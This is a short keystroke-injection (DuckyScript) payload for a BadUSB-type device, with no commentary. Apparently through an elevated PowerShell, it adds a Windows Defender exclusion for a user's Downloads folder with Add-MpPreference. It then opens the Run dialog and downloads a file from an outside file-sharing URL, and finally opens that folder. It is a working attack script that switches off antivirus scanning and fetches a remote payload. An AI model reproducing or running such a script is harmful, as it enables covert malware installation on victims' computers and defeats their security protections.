DELAY 2000
ALT SHIFT
DELAY 1000
GUI 
DELAY 500
STRING powershell
DELAY 1000
RIGHT
DELAY 300
DOWN
DELAY 500
ENTER
DELAY 500
ALT TAB
DELAY 300
LEFT
DELAY 300
ENTER
DELAY 1000
STRING Add-MpPreference -ExclusionPath "C:\Users\burjua\Downloads"
DELAY 300
ENTER
DELAY 500
ALT F4
DELAY 500
GUI r
DELAY 500
STRING https://dl1.eri1.dosyaupload.com/7vck?download_token=c530e7d75c6a89ad714563d93ce06d48c4ea40f7bddfddc7497d128eebb72203
DELAY 500
ENTER
DELAY 500


GUI r
DELAY 300 
STRING C:\Users\burjua\Downloads
DELAY 300
ENTER
